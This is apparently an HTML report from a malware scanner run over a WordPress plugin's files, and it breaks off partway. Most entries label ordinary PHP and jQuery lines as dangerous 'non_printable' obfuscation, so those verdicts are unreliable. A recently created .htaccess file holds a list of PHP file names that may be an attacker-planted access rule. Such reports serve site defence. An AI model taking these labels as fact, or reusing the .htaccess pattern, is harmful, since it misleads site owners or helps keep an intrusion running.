<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_id_by_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_init </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 645</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$product</span><span style="color: #007700">[</span><span style="color: #DD0000">'id'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$product</span><span style="color: #007700">[</span><span style="color: #DD0000">'id'</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 656</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_dismiss_extension_nag' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_dismiss_extension_nag</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_core_styles</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_debug_link' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 686</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_debug_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$text </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 699</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_products_registration_page' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_products_registration_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 713</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">brainstorm registration page URL</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_registration_page_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_registration_page_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$append </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'options.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 747</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_registration_link </span><span style="color: #007700">. </span><span style="color: #DD0000">'' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'settings.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'options-general.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'index.php?page=bsf-registration' </span><span style="color: #007700">. </span><span style="color: #0000BB">$append </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">extension installer page URL</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_exension_installer_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 774</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_exension_installer_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'settings.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 784</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=bsf-extensions-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$priduct_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_check_brainstorm_menu_location' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_check_brainstorm_menu_location</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_set_options' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 813</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_set_options</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_flush_skip_registration</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">site option brainstorm_products</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (array) </span><span style="color: #0000BB">$brainstorm_products</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_brainstorm_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_brainstorm_products</span><span style="color: #007700">( </span><span style="color: #0000BB">$mix </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 958</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$brainstorm_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_envato_redirect_url_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 985</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_send_json_success</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_369").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/BSF_WP_CLI_Command.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_370" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">license_manager </span><span style="color: #007700">= new </span><span style="color: #0000BB">BSF_License_Manager</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">license</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$assoc_args </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) && </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] == </span><span style="color: #DD0000">'activate' </span><span style="color: #007700">|| </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] == </span><span style="color: #DD0000">'deactivate' </span><span style="color: #007700">) { </span><span style="color: #0000BB">$action </span><span style="color: #007700">= </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]; } else { </span><span style="color: #0000BB">WP_CLI</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">( </span><span style="color: #DD0000">'Please enter t</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">license</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$assoc_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_370").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/smooth-scroll-setting.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_371" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">true</span><span style="color: #007700">); </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">trigger</span><span style="color: #007700">(</span><span style="color: #DD0000">'onUltima</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_371").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_372" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span 